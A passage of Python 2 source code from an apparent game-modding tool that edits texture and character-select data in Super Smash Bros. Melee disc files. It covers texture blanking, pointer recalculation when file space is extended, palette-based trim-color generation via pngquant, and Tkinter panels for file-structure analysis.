                    nextMipmapLevel = Gui.datTextureTree.get_children( iid )[0]
                else:
                    nextMipmapLevel = Gui.datTextureTree.next( iid )
                if nextMipmapLevel: # This will be an empty string if this is the last level (1x1)
                    blankTextures( cascadingMipmapChange=True, iidSelectionsTuple=tuple([nextMipmapLevel]) )
        # Update the program status
        if not cascadingMipmapChange: # (only want to do this on the initial run of this function)
            if len( iidSelectionsTuple ) == 1: updateProgramStatus( 'Texture Blanked' )
            else: updateProgramStatus( 'Textures Blanked' )
# def disableTextures(): # Unused
# iidSelectionsTuple = Gui.datTextureTree.selection()
# if len(iidSelectionsTuple) == 0: msg('No textures are selected.')
# else:
# global datData, unsavedDatChanges
# for iid in iidSelectionsTuple:
# # Collect info on the selected texture.
# #imageDataDetails, dimensions, imageType = Gui.datTextureTree.item( iid, 'values' )
# imageDataOffset = int( iid ) #int( imageDataDetails.split()[0], 16 ) - 0x20
# for headerInfo in getImageDataHeaders( datFile, imageDataOffset ): # Gets a list of the headers that point to this texture.
# # Get the offset of the pointer (to the image data header) in the Texture Structure.
# parentPointerOffsets = getParentPointerOffsets( datFile, headerInfo[0] )
# if parentPointerOffsets == []:
# msg( 'No parent structures found!' )
# elif len(parentPointerOffsets) > 1:
# print 'multiple parent pointers found!'
# # #ttk.Label( textureStructureProperties, text='Pointer offsets found in multiple Texture Structures (' + str(len(parentPointerOffsets)) + ' total): ' ).pack(pady=pady)
# # for i in xrange( len(parentPointerOffsets) ):
# # ttk.Label(textureStructureProperties, text=uHex(parentPointerOffsets[i] + 0x20)).pack(pady=pady)
# else: # Only one offset found.
# for parentPointerOffset in parentPointerOffsets:
# # Confirm this is a pointer by checking for it in the RT Table.?
# # Zero out the Texture Struct's pointer to the Image Data Header.
# print 'Image Header Pointer Offset: ' + uHex( parentPointerOffset + 0x20 )
# datData = replaceHex( datData, parentPointerOffset, '00000000')
# globalDatFile.unsavedChanges.append( 'Texture disabled at ' + uHex(imageDataOffset + 0x20) + ' in ' + os.path.basename( globalDatFile.path ) + '.' )
# updateProgramStatus( 'Texture(s) Disabled' )
def extendTextureSpace( offset, diff ): # test args: 0x3BF40, 0xC800 (Closed port texture in MnSlChr, at 0x2F760)
""" This function will expand the data area at the given offset, starting at the first argument. The second argument is the amount
to increase by. All pointers occurring after the sum of the two arguments will be recalculated. Example usage would have the
first argument as the end point of a texture, and the second argument as the amount to increase the space by. """
if diff == 0: return
offset -= 0x20 # To account for the file header, which is not included in datData
datDataBytes = globalDatFile.data
rtDataBytes = globalDatFile.rtData
offsetBytes = toBytes( offset )
headerInfo = globalDatFile.headerInfo
# Update the file header with the new file size and start of the relocation table.
newFileSize = headerInfo['filesize'] + diff
newRtStart = headerInfo['rtStart'] + diff
globalDatFile.headerData[:8] = toBytes( newFileSize ) + toBytes( newRtStart )
# For each entry in the relocation table, update the address it points to, and the value of the pointer there, if they point to locations beyond the extended space.
entriesUpdated = 0
pointersUpdated = 0
for rtByteOffset in xrange( 0, len(rtDataBytes), 4 ):
# If the pointer appears after the change, update its address in the relocation table accordingly.
rtEntryBytes = rtDataBytes[rtByteOffset:rtByteOffset+4]
rtEntryInt = toInt( rtEntryBytes )
if rtEntryBytes >= offsetBytes:
rtDataBytes[rtByteOffset:rtByteOffset+4] = toBytes( rtEntryInt + diff )
entriesUpdated += 1
# If the place that the pointer points to is after the space change, update its value accordingly.
dataPointer = datDataBytes[rtEntryInt:rtEntryInt+4]
if dataPointer >= offsetBytes:
datDataBytes[rtEntryInt:rtEntryInt+4] = toBytes( toInt(dataPointer) + diff )
pointersUpdated += 1
print 'length of defined section:', headerInfo['rtEnd'] - headerInfo['rtStart'], ' lenght of actual section:', len(rtDataBytes)
datDataBytes[headerInfo['rtStart']:headerInfo['rtEnd']] = rtDataBytes # rtData (the global variable isn't later merged. so we need to do this here)
# Update offsets in the root/reference node tables
rootAndRefNodesTable = datDataBytes[headerInfo['rtEnd']:headerInfo['stringTableStart']]
for nodeByteOffset in xrange( 0, len(rootAndRefNodesTable), 8 ): # 8 bytes = 1 table entry
filePointer = rootAndRefNodesTable[nodeByteOffset:nodeByteOffset+4]
if filePointer >= offsetBytes:
newNodePointer = toInt( filePointer ) + diff
if newNodePointer - roundTo32( newNodePointer ) != 0: print 'Warning, root/ref node pointers must be aligned to 0x20 bytes!'
rootAndRefNodesTable[nodeByteOffset:nodeByteOffset+4] = toBytes( newNodePointer )
pointersUpdated += 1
datDataBytes[headerInfo['rtEnd']:headerInfo['stringTableStart']] = rootAndRefNodesTable
if diff < 0: # Remove bytes from the latter section
datDataBytes = datDataBytes[:offset] + datDataBytes[offset+diff:]
else: # Fill the newly extended space with zeros.
datDataBytes = datDataBytes[:offset] + bytearray( diff ) + datDataBytes[offset:]
globalDatFile.data = datDataBytes
globalDatFile.rtData = rtDataBytes
msg('RT Entries updated: ' + str(entriesUpdated) + '\nPointers updated: ' + str(pointersUpdated))
globalDatFile.unsavedChanges.append( uHex(diff) + ' of space added to file at offset ' + uHex(offset + 0x20) + '.' )
updateProgramStatus( 'Space Extension Complete' )
def generateTrimColors( fileIid, autonomousMode=False ):
    """ Generates a pair of CSP 'trim' colors (a base color and an accent color) for a costume
        file in the disc: decodes all non-shading-layer textures in the file, combines them into
        one tall 'super image', palettizes that image with pngquant, and picks the base color
        plus the most saturated/luminous accent from the resulting palette.

            fileIid:         disc-tree item id of the costume file to analyze
            autonomousMode:  if True, writes the colors into the game immediately;
                             otherwise shows the color-swatch chooser window for user review """
    #tic = time.clock()
    # Get the file's data and parse the file for basic info
    theDatFile = hsdFiles.datFileObj( source='disc' )
    theDatFile.load( fileIid, fileData=getFileDataFromDiscTreeAsBytes( iid=fileIid ) )
    hInfo = theDatFile.headerInfo
    # Quick failsafe to make sure the file is recognizable, avoiding large processing time
    if hInfo['rootNodeCount'] > 300 or hInfo['referenceNodeCount'] > 300 or hInfo['rtEntryCount'] > 45000 or len( theDatFile.rtData ) > 200000:
        msg( 'The file structure of ' + fileIid + ' could not be analyzed for trim color generation.' )
        return
    updateProgramStatus( 'Generating CSP Trim Colors....' )
    Gui.programStatusLabel.update()
    # Collect the textures in the file
    textures = {} # keys: imageDataOffset, values: pil images
    totalWidth = 0
    totalHeight = 0
    for imageDataOffset, imageHeaderOffset, _, _, width, height, imageType, _ in identifyTextures( theDatFile ):
        # Skip this texture if it's a shading layer, by checking the flags of the Texture Struct that this texture is attached to
        imageDataHeader = theDatFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderOffset )
        if not imageDataHeader: continue
        for headerParentOffset in imageDataHeader.getParents():
            # Test for a Texture Struct
            textureStruct = theDatFile.initSpecificStruct( hsdStructures.TextureObjDesc, headerParentOffset, printWarnings=False )
            if textureStruct: break
        else: continue # Above loop didn't break; no texture struct found (must be part of an animation such as an eye)
        if textureStruct.getValues( 'GXTexGenSrc' ) != 4: # Checking layer flags
            #print 'Skipping texture', uHex( 0x20+imageDataOffset ), 'for trim color generation, as it appears to be a shading layer'
            continue
        try:
            imageDataLength = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType )
            imageData = theDatFile.getData( imageDataOffset, imageDataLength )
            # Skip this texture if its data has been "blanked"
            if not any( imageData ): continue
            # Paletted formats (CI4/CI8/CI14x2) need their palette data for decoding
            if imageType == 8 or imageType == 9 or imageType == 10:
                paletteData, paletteType = getPaletteData( theDatFile, imageDataOffset )
            else:
                paletteData = ''
                paletteType = None
            # Decode the texture data
            newImg = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
            newImg.deblockify() # This decodes the image data, to create an rgbaPixelArray.
            textures[imageDataOffset] = Image.new( 'RGBA', (width, height) )
            textures[imageDataOffset].putdata( newImg.rgbaPixelArray )
            # Update the cumulative dimensions of the new super image
            # (textures are stacked vertically, so width is the max and height is the sum)
            if width > totalWidth:
                totalWidth = width
            totalHeight += height
        except:
            print 'Failed to decode texture at', uHex(0x20+imageDataOffset), 'for trim color generation'
    # Combine the images collected above into one super image
    yOffset = 0
    superImage = Image.new( 'RGBA', (totalWidth, totalHeight) )
    for texture in textures.values():
        superImage.paste( texture, (0, yOffset) )
        yOffset += texture.size[1]
    # Save the image data to a memory buffer so it can be sent to the color quantizer without creating a file.
    superImageBuffer = StringIO()
    superImage.save( superImageBuffer, 'png' )
    # Create a palette for the super image (pngquant reads the PNG from stdin; '13' is the target color count)
    exitCode, outputStream = cmdChannel( '"' + pathToPngquant + '" --speed 3 13 - ', standardInput=superImageBuffer.getvalue() )
    superImageBuffer.close()
    if exitCode != 0:
        print 'Error while generating super image palette; exit code:', exitCode
        print outputStream
        msg( 'There was an error during color generation. Error code: '+str(exitCode) + '\n\nDetails:\n' + outputStream, 'Error Generating CSP Trim Colors.' )
        updateProgramStatus( 'Error Generating CSP Trim Colors.' )
        return
    # Get the palette generated for the super image
    palettedFileBuffer = StringIO( outputStream )
    pngImage = png.Reader( palettedFileBuffer )
    pngImage.read() # Needed for pulling the palette; its return value might be useful to print
    generatedPalette = pngImage.palette( alpha='force' )
    palettedFileBuffer.close()
    # Filter out the palette entry relating to the extra empty space in the super image (alpha of 0)
    generatedPalette = [ entry for entry in generatedPalette if entry[3] != 0 ]
    baseColor = generatedPalette[0]
    # Get a value to determine whether the base color is light or dark (value/brightness)
    baseColorValue = rgb2hsv( baseColor )[2]
    # Convert the colors to HSV format (excluding the base color)
    hsvList = [ rgb2hsv(color) for color in generatedPalette[1:] ]
    # Go through the colors and look for the highest combination of luminance and saturation in order to pick an accent color
    highestSatLum = 0
    highestSatLumColorIndex = 0
    for i, color in enumerate( hsvList ):
        _, saturation, value = color # first value is hue
        if baseColorValue >= .5: # Place higher weight on darker colors (values) instead
            satLum = saturation + 1 - value
        else: satLum = saturation + value
        if satLum > highestSatLum:
            highestSatLum = satLum
            highestSatLumColorIndex = i
    accentColor = generatedPalette[1:][highestSatLumColorIndex]
    filename = os.path.basename( fileIid )
    if autonomousMode:
        updateTrimColors( filename, colors=(rgb2hex(baseColor).replace('#', ''), rgb2hex(accentColor).replace('#', '')) )
    else: # Show the user some options for the accent color, and let them decide whether to add these colors to their game.
        updateProgramStatus( 'CSP Trim Colors Generated' )
        showColorSwatches( colors=generatedPalette, chosenColors=(baseColor, accentColor), filename=filename )
def updateTrimColors( filename, colors=() ):
    """ Writes a (baseColor, accentColor) pair of hex color strings into the CSP trim-color
        table within the game's Character Select Screen file (MnSlChr). The row to update is
        determined by parsing the character and costume-color codes from the costume filename.
        Returns False on any validation/lookup failure; updates the disc tree entry (and the
        second CSS file on 20XXHP v4.07+) on success.

            filename:  costume filename, e.g. 'PlCaRe.dat' (chars 2-4 = character, 4-6 = color)
            colors:    tuple of two 6-digit hex color strings (no '#' prefix) """
    tableOffset = 0x3a3c90 # Offset of the trim-color table within the CSS file
    characterTableOffsets = { # First value is the start of that character's section (to the character name), relative to the start of the table
        'ca': ( 0, 'gy', 're', 'wh', 'gr', 'bu' ), # Falcon
        'dk': ( 0x70, 'bk', 're', 'bu', 'gr' ), # DK
        'fx': ( 0xD0, 'or', 'la', 'gr' ), # Fox
        'kb': ( 0x170, 'ye', 'bu', 're', 'gr', 'wh' ), # Kirby
        'kp': ( 0x1E0, 're', 'bu', 'bk' ), # Bowser
        'lk': ( 0x230, 're', 'bu', 'bk', 'wh' ), # Link
        'lg': ( 0x290, 'wh', 'bu', 'pi' ), # Luigi
        'mr': ( 0x2E0, 'ye', 'bk', 'bu', 'gr' ), # Mario
        'ms': ( 0x340, 're', 'gr', 'bk', 'wh' ), # Marth
        'mt': ( 0x3A0, 're', 'bu', 'gr' ), # Mewtwo
        'ns': ( 0x3F0, 'ye', 'bu', 'gr' ), # Ness
        'pe': ( 0x440, 'ye', 'wh', 'bu', 'gr' ), # Peach
        'pk': ( 0x4A0, 're', 'bu', 'gr' ), # Pika
        'nn': ( 0x4F0, 'ye', 'aq', 'wh' ), # Nana (updating either IC changes the colors for both)
        'pp': ( 0x4F0, 'gr', 'or', 're' ), # Popo
        'pr': ( 0x540, 're', 'bu', 'gr', 'ye' ), # Jiggs
        'ss': ( 0x5A0, 'pi', 'bk', 'gr', 'la' ), # Samus
        'ys': ( 0x600, 're', 'bu', 'ye', 'pi', 'aq' ), # Yoshi
        'sk': ( 0x670, 're', 'bu', 'gr', 'wh' ), # Sheik (updating either Sheik/Zelda changes the colors for both)
        'zd': ( 0x670, 're', 'bu', 'gr', 'wh' ), # Zelda
        'fc': ( 0x6D0, 're', 'bu', 'gr' ), # Falco
        'cl': ( 0x720, 're', 'bu', 'wh', 'bk' ), # Y. Link
        'dr': ( 0x780, 're', 'bu', 'gr', 'bk' ), # Dr. Mario
        'fe': ( 0x7E0, 're', 'bu', 'gr', 'ye' ), # Roy
        'pc': ( 0x840, 're', 'bu', 'gr' ), # Pichu
        'gn': ( 0x890, 're', 'bu', 'gr', 'la' ), # Ganon
        'bo': ( 0x8F0, ), # M. Wireframe
        'gl': ( 0x910, ), # F. Wireframe
        'gk': ( 0x930, ) # Giga Bowser
    }
    # Parse the filename and make sure table location information for it is available
    char = filename[2:4]
    color = filename[4:6]
    if char not in characterTableOffsets or ( color not in characterTableOffsets[char] and color != 'nr' and color != 'rl' and color != 'rr' ): # Last two are for Falcon's Red alt
        print 'Unable to process CSP trim colors for', filename, 'due to an invalid filename.'
        return False
    # Calculate the offset of the color to be changed
    if color == 'nr': rowNumber = 1
    elif len( characterTableOffsets[char] ) == 1: rowNumber = 1 # These characters only have one set of alts
    elif color == 'rl' or color == 'rr': rowNumber = 3 # Both are Falcon's red costume
    else:
        for i, colorCode in enumerate( characterTableOffsets[char] ):
            if color == colorCode:
                rowNumber = i + 1 # +1 accounts for the missing 'nr' (for the Neutral costume) in the tuple
                break
        else: # loop above didn't break; colorCode not found (shouldn't happen due to previous validation)
            print 'Unable to process CSP trim colors for', filename, 'due to an invalid filename.'
            return False
    # Each table row is 0x10 bytes; left-alt colors occupy the first 8 bytes, right-alt colors the last 8
    fileOffset = tableOffset + characterTableOffsets[char][0] + rowNumber * 0x10
    if filename[-4:] == '.rat': fileOffset += 8
    elif filename[-4:] == '.usd' and color == 'rr': fileOffset += 8 # For Falcon's Red Right alt
    print 'CSP Trim colors generated for', filename + ':', colors, '| Being placed at offset:', uHex(fileOffset)
    # Validate the colors
    if len( colors[0] ) != 6 or not validHex( colors[0] ):
        print 'Invalid Base Color value.'
        return False
    elif len( colors[1] ) != 6 or not validHex( colors[1] ):
        print 'Invalid Accent Color value.'
        return False
    # Find the CSS file iid
    postV407 = False # Refers to the version of 20XXHP (versions later than 4.06 use .0sd & .1sd rather than .usd)
    cssIid = scanDiscForFile( 'MnSlChr.u' )
    if not cssIid:
        cssIid = scanDiscForFile( 'MnSlChr.0' )
        if cssIid: postV407 = True
    if not cssIid:
        print 'Unable to find the CSS file in the disc.'
        return False
    # Get the CSS's file information and data
    description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( cssIid, 'values' )
    cssData = getFileDataFromDiscTree( iidValues=(entity, isoOffset, fileSize, source, data) )
    if not cssData: return False
    # Replace the color data at the specified offset
    cssData = replaceHex( cssData, fileOffset, colors[0] )
    cssData = replaceHex( cssData, fileOffset + 4, colors[1] )
    Gui.isoFileTree.item( cssIid, values=('CSP Trim Colors Updated', entity, isoOffset, fileSize, isoPath, 'ram', cssData), tags='changed' )
    global unsavedDiscChanges
    updateString = isoPath.split('/')[-1] + ' updated with new CSP Trim colors.'
    if not updateString in unsavedDiscChanges: unsavedDiscChanges.append( updateString )
    # Update the second CSS file as well if this is 20XXHP v4.07+
    if postV407:
        nextCssIid = scanDiscForFile( 'MnSlChr.1' )
        # Get the CSS's file information and data
        description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( nextCssIid, 'values' )
        cssData = getFileDataFromDiscTree( iidValues=(entity, isoOffset, fileSize, source, data) )
        if not cssData: return False
        # Replace the color data at the specified offset
        cssData = replaceHex( cssData, fileOffset, colors[0] )
        cssData = replaceHex( cssData, fileOffset + 4, colors[1] )
        Gui.isoFileTree.item( nextCssIid, values=('CSP Trim Colors Updated', entity, isoOffset, fileSize, isoPath, 'ram', cssData), tags='changed' )
        updateString = isoPath.split('/')[-1] + ' updated with new CSP Trim colors.'
        if not updateString in unsavedDiscChanges: unsavedDiscChanges.append( updateString )
    updateProgramStatus( 'CSP Trim Colors Updated' )
class showColorSwatches( object ):
    """ Creates a non-modal window to present the user with options on pre-generated colors
        generated for a character's CSP trim colors (for left/right alt costumes). """
    # Class-level reference to the single window instance; only one is shown at a time
    window = None
    def __init__( self, colors=[], chosenColors=(), filename='' ):
        """ colors:       full generated palette (list of RGBA tuples) to offer as swatches
            chosenColors: (baseColor, accentColor) RGBA tuples pre-selected by the generator
            filename:     costume filename the colors were generated for """
        self.colors = colors
        self.chosenColors = chosenColors
        self.filename = filename
        # Close any previously-open instance before showing a new one
        if showColorSwatches.window: showColorSwatches.window.destroy()
        self.showWindow()
    def showWindow( self ):
        """ Builds and displays the color-chooser toolwindow. """
        # Define the window.
        showColorSwatches.window = Tk.Toplevel( Gui.root )
        showColorSwatches.window.title( 'CSP Trim Color Generator' )
        showColorSwatches.window.attributes('-toolwindow', 1) # Makes window framing small, like a toolbox/widget.
        showColorSwatches.window.resizable( width=True, height=True )
        #self.window.wm_attributes('-topmost', 1) # Makes the window always on top
        showColorSwatches.window.protocol( 'WM_DELETE_WINDOW', self.close ) # Overrides the 'X' close button.
        # Calculate the spawning position of the new window
        rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
        showColorSwatches.window.geometry( '+' + str(rootDistanceFromScreenLeft + 180) + '+' + str(rootDistanceFromScreenTop + 180) )
        # Populate the window
        self.mainFrame = Tk.Frame( showColorSwatches.window )
        # Show the generated palette colors
        if self.colors:
            def onColorClick( event ):
                # Set the clicked swatch's color as the new Accent Color (swatch + entry field)
                widget = event.widget.find_closest(event.x, event.y)
                targetColor = self.colorsCanvas.itemcget( widget, 'fill' ).replace('#', '')
                self.color2Swatch['bg'] = '#' + targetColor
                self.color2Entry.delete( 0, 'end' )
                self.color2Entry.insert( 'end', targetColor + '00' )
            ttk.Label( self.mainFrame, wraplength=230, text='These are the colors generated for "' + self.filename + '". The Base Color should be the most prominent color '
                'for the costume. But you might try tweaking the Accent Color below.' ).pack( padx=16, pady=4 )
            self.colorsCanvas = Tk.Canvas( self.mainFrame, borderwidth=2, relief='ridge', background='white', width=197, height=19 )
            self.colorsCanvas.pack( pady=4 )
            x = 10
            y = 10
            for colorTuple in self.colors: # For each palette entry....
                colorHex = rgb2hex( colorTuple )
                self.colorsCanvas.create_rectangle( x, y, x + 8, y+8, width=1, fill=colorHex, tags='entries' )
                x += 16
            # Make the swatches clickable, with a pointer cursor on hover
            self.colorsCanvas.tag_bind( 'entries', '<1>', onColorClick )
            def onMouseEnter(e): self.colorsCanvas['cursor']='hand2'
            def onMouseLeave(e): self.colorsCanvas['cursor']=''
            self.colorsCanvas.tag_bind( 'entries', '<Enter>', onMouseEnter )
            self.colorsCanvas.tag_bind( 'entries', '<Leave>', onMouseLeave )
        chosenColorsFrame = Tk.Frame( self.mainFrame )
        baseColor = rgb2hex( self.chosenColors[0] )
        accentColor = rgb2hex( self.chosenColors[1] )
        # Color 1 / Base Color
        ttk.Label( chosenColorsFrame, text='Base Color' ).grid( column=0, row=0, padx=8, pady=3 )
        self.color1Swatch = Tk.Frame( chosenColorsFrame, bg=baseColor, width=60, height=25 )
        self.color1Swatch.grid( column=0, row=1, padx=8, pady=3 )
        self.color1Swatch.grid_propagate( False )
        self.color1Entry = ttk.Entry( chosenColorsFrame, text=baseColor + '00', width=9 )
        self.color1Entry.delete( 0, 'end' )
        self.color1Entry.insert( 'end', baseColor.replace('#', '') + '00' )
        self.color1Entry.grid( column=0, row=2, padx=8, pady=3 )
        # Color 2 / Accent Color
        ttk.Label( chosenColorsFrame, text='Accent Color' ).grid( column=1, row=0, padx=8, pady=3 )
        self.color2Swatch = Tk.Frame( chosenColorsFrame, bg=accentColor, width=60, height=25 )
        self.color2Swatch.grid( column=1, row=1, padx=8, pady=3 )
        self.color2Swatch.grid_propagate( False )
        self.color2Entry = ttk.Entry( chosenColorsFrame, text=accentColor + '00', width=9 )
        self.color2Entry.delete( 0, 'end' )
        self.color2Entry.insert( 'end', accentColor.replace('#', '') + '00' )
        self.color2Entry.grid( column=1, row=2, padx=8, pady=3 )
        chosenColorsFrame.pack( pady=3 )
        ttk.Button( self.mainFrame, text='Update in Game (MnSlChr Table)', command=self.sendTrimColors ).pack( ipadx=10, pady=7 )
        self.mainFrame.pack( fill='both', expand=1 )
    def sendTrimColors( self ):
        """ Reads the (possibly user-edited) color entry fields and writes them into the game's
            trim-color table, then closes the window. """
        baseColor = self.color1Entry.get()[:6].replace('#', '')
        accentColor = self.color2Entry.get()[:6].replace('#', '')
        updateTrimColors( self.filename, colors=(baseColor, accentColor) )
        self.close()
    def close( self ):
        """ Destroys the window and clears the class-level reference to it. """
        showColorSwatches.window.destroy()
        showColorSwatches.window = None
#=================================#
# ~ ~ Structural Analysis tab ~ ~ #
#=================================#
def getTreeviewDepth( treeviewWidget, iid ):
    """ Returns how many ancestors the given treeview item has (0 for a root-level item). """
    level = 0
    currentIid = treeviewWidget.parent( iid )
    while currentIid: # .parent() returns '' once the root is reached
        level += 1
        currentIid = treeviewWidget.parent( currentIid )
    return level
def getStructureIids( targetOffsets ):
    """ Finds all instances of a structure or list of structures in the treeview;
        i.e. every item whose iid's final path component (a structure offset)
        appears in the given collection of target offsets. """
    return tuple( iid for iid in Gui.fileStructureTree.allIids
                  if int( iid.rsplit('/', 1)[-1] ) in targetOffsets )
def adjustSavColumnWidth( treeItem, currentViewingWidth=None ):
    """ Widens the Structural Analysis tree's structure-name column when the given
        treeview item is estimated to need more horizontal space than is available. """
    tree = Gui.fileStructureTree
    # Determine how much space is currently available (the '#0' column; excludes the Offset column)
    if not currentViewingWidth:
        currentViewingWidth = tree.column( '#0', 'width' )
    # Estimate the space the new item needs: indentation from tree depth, ~7px per character
    # of the item's text, and 5px/7px of padding before/after the '+' expander sign
    indentWidth = 20 * getTreeviewDepth( tree, treeItem ) + 20 # From the left-side of the treeview
    textWidth = len( tree.item(treeItem, 'text') ) * 7 # todo: make dynamic for scaling
    neededWidth = 5 + indentWidth + textWidth + 7
    if neededWidth > currentViewingWidth:
        # Widen the column, then scroll all the way to the right so the item is visible
        tree.column( '#0', width=neededWidth )
        tree.update() # Need the GUI to update the widget's new width
        tree.xview_moveto( 1 )
def addHelpBtn( helpText ):
    """ Places a small clickable '?' label near the top-right corner of the structure
        properties panel, which pops up the given help text when clicked. """
    def showHelpText( event, message=helpText ): # Default arg binds the text at definition time
        msg( message, 'Good to Know' )
    helpLabel = ttk.Label( Gui.structurePropertiesFrame.interior, text='?', foreground='#445', cursor='hand2' )
    helpLabel.bind( '<1>', showHelpText )
    helpLabel.place( relx=1, x=-17, y=4 )
def showFileProperties():
    """ Populates the Structural Analysis properties panel with top-level info on the currently
        loaded DAT file: file size, pointer/structure counts, and node counts, plus
        'View Hex' and 'Deep Dive' operation buttons. """
    # Set the top-most file name label
    ttk.Label( Gui.structurePropertiesFrame.interior, text=globalDatFile.fileName, font="-weight bold" ).pack( pady=12 )
    # Add a help button
    helpText = ( '"Total Structures" counts structures in the data section of the file, as well as 4 to 5 other basic DAT file structures, '
        'which are: the file header, relocation table, string table, and the root/reference node tables.' )
    addHelpBtn( helpText )
    # Add file details; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
    emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
    basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
    # Construct the strings to be displayed
    fileSizeText = 'File Size: 0x{0:X} ({0:,} bytes)'.format( globalDatFile.headerInfo['filesize'] )
    pointersCountText = 'Total Pointers: {:,}'.format( len(globalDatFile.pointerOffsets) )
    structCountText = 'Total Structures: {:,}'.format( len(globalDatFile.structureOffsets) )
    rootNodesText = 'Root Nodes: {:,}'.format( len(globalDatFile.rootNodes) )
    refNodesText = 'Reference Nodes: {:,}'.format( len(globalDatFile.referenceNodes) )
    # Add the above strings to the GUI using a table grid
    ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
    ttk.Label( basicDetailsFrame, text=pointersCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, sticky='w', padx=11, pady=(4,0) )
    ttk.Label( basicDetailsFrame, text=structCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=2, sticky='w', padx=11 )
    ttk.Label( basicDetailsFrame, text=rootNodesText, wraplength=Gui.structPropFrameWrapLength ).grid( column=1, row=1, sticky='w', padx=11 )
    ttk.Label( basicDetailsFrame, text=refNodesText, wraplength=Gui.structPropFrameWrapLength ).grid( column=1, row=2, sticky='w', padx=11 )
    basicDetailsFrame.pack( pady=0 )
    # Add file operation buttons
    buttonFrame = ttk.Frame( Gui.structurePropertiesFrame.interior )
    buttonFrame.pack( pady=(12, 0) ) # Need to attach this before performing a deep dive
    ttk.Button( buttonFrame, text='View Hex', command=viewDatFileHex ).pack( side='left', padx=10 )
    if globalDatFile.deepDiveStats:
        # A dive was already done; disable the button and just re-display the cached results
        ttk.Button( buttonFrame, text='Deep Dive', command=performDeepDive, state='disabled' ).pack( side='left', padx=10 )
        performDeepDive() # In this case, this'll skip the actual dive process and just display the data
    else:
        ttk.Button( buttonFrame, text='Deep Dive', command=performDeepDive ).pack( side='left', padx=10 )
def showRelocationTableInfo():
    """ Populates the Structural Analysis properties panel with info on the file's
        relocation table: location, size, and entry count. """
    # Set the top-most file structure name label
    ttk.Label( Gui.structurePropertiesFrame.interior, text='Relocation Table', font="-weight bold" ).pack( pady=12 )
    # Add info; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
    emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
    basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
    # Construct the strings to be displayed (+0x20 converts data-section offsets to absolute file offsets)
    locationText = 'Location: 0x{:X} - 0x{:X}'.format( 0x20+globalDatFile.headerInfo['rtStart'], 0x20+globalDatFile.headerInfo['rtEnd'] )
    fileSizeText = 'Size: 0x{0:X} ({0:,} bytes)'.format( globalDatFile.headerInfo['rtEnd'] - globalDatFile.headerInfo['rtStart'] )
    entriesCountText = 'Total Entries: {:,}'.format( globalDatFile.headerInfo['rtEntryCount'] )
    # Add the above strings to the GUI using a table grid
    ttk.Label( basicDetailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
    ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
    ttk.Label( basicDetailsFrame, text=entriesCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=2, columnspan=2 )
    basicDetailsFrame.pack( pady=0 )
def showNodeTableInfo( name ): # For root and reference node tables
    """ Populates the Structural Analysis properties panel with info on either the root node
        table or the reference node table, plus a clickable link that lists all node entries.

            name: the table's display name; must start with 'Root' for the root node table,
                  anything else selects the reference node table """
    if name.startswith( 'Root' ):
        totalEntries = globalDatFile.headerInfo['rootNodeCount']
        rootStructCount = len( globalDatFile.rootStructNodes )
        labelCount = len( globalDatFile.rootLabelNodes )
        start = 0x20 + globalDatFile.headerInfo['rtEnd'] # Root nodes table begins right after the relocation table
        end = 0x20 + globalDatFile.headerInfo['rootNodesEnd']
        nodeDetails = [ '\tNode ' + str(i+1) + ', @ ' + uHex(node[0] + 0x20) + ' - - ' + node[1] for i, node in enumerate( globalDatFile.rootNodes ) ]
    else: # The reference nodes table
        totalEntries = globalDatFile.headerInfo['referenceNodeCount']
        rootStructCount = len( globalDatFile.refStructNodes )
        labelCount = len( globalDatFile.refLabelNodes )
        start = 0x20 + globalDatFile.headerInfo['rootNodesEnd'] # Reference nodes follow the root nodes
        end = 0x20 + globalDatFile.headerInfo['stringTableStart']
        nodeDetails = [ '\tNode ' + str(i+1) + ', @ ' + uHex(node[0] + 0x20) + ' - - ' + node[1] for i, node in enumerate( globalDatFile.referenceNodes ) ]
    # Add the title
    ttk.Label( Gui.structurePropertiesFrame.interior, text=name, font="-weight bold" ).pack( pady=(12, 0) )
    # Add basic info
    emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
    basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
    basicInfo = 'Location: 0x{:X} - 0x{:X}\nTotal Entries: {}\n\nRoot Structures: {}\nLabels: {}'.format( start, end, totalEntries, rootStructCount, labelCount )
    ttk.Label( basicDetailsFrame, text=basicInfo, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
    basicDetailsFrame.pack()
    # Add the label/button to show all nodes info
    nodeName = name.split()[0]
    def displayNodeInfo( event ): cmsg( '\n'.join(nodeDetails), title=nodeName + ' Table Nodes', align='left' )
    label = ttk.Label( Gui.structurePropertiesFrame.interior, text='View Nodes', wraplength=Gui.structPropFrameWrapLength, cursor='hand2', foreground='#00F' )
    label.bind( '<1>', displayNodeInfo )
    label.pack( pady=(12, 0) )
def showStringTableInfo():
    """ Populates the Structural Analysis properties panel with info on the file's string
        table: location (noting whether it ends at the end of the file), size, and the
        total entry count (one string per root/reference node). """
    # Gather data and build a few strings for the GUI
